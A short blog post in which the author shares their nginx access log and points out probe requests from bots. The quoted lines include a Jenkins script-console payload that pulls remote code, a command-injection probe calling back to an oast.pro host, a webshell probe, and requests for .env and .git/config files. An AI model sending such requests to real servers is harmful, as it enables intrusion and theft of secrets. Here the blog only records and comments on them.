Thursday, February 1, 2024

Requests You Can Get

Running my blog on a proper cloud compute instance with nginx can give you a lot more insight into your website traffic. Here is a selection of weird requests I've received a lot of. I assume many of these are bots trying to hack me.

I ssh into my instance and run

cat /var/log/nginx/access.log

to see a bunch of requests and logs.

45.118.146.123 - - [31/Jan/2024:21:10:05 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 134 "http://170.64.194.63:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.71.204.176 - - [31/Jan/2024:20:57:05 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
78.153.140.175 - - [31/Jan/2024:20:46:17 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [31/Jan/2024:20:46:20 +0000] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03\xB4\xB3c\xCD\xDE.PBa\xA4\xC5bz7!\x975)\xAB\xE0\x15\x90\x10J\xB24V\x899q\x07\xE7 0\x92\xD2@W-79\x00\x06uA)k\xA7\xA1\xB3\x12jz\x88\x00\x8D\xC8\x17^\xC0e`-*\x9E\x00b\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\xA3\x00\x9F\x00\xA2\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0$\xC0(\xC0" 400 166 "-" "-"
167.71.204.176 - - [31/Jan/2024:20:33:22 +0000] "POST /integration/saveGangster.action HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
167.71.204.176 - - [31/Jan/2024:20:01:19 +0000] "GET /webadmin/script?command=|%20nslookup%20cmt7k4eft607jm8s2jog3p5dyae4cqszu.oast.pro HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
193.46.255.120 - - [31/Jan/2024:13:54:22 +0000] "GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
167.71.204.176 - - [31/Jan/2024:13:21:44 +0000] "GET /seeyon/test123456.jsp?pwd=asasd3344&2bioD1RjT6Mp6jPRn9dMjk94geq=ipconfig HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
162.158.94.158 - - [31/Jan/2024:06:20:57 +0000] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
172.71.81.145 - - [31/Jan/2024:04:11:40 +0000] "GET /.git/config HTTP/1.1" 404 9 "-" "Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5"

It's pretty sad that the internet is just a cesspool of bots and bad actors trying to do bad things.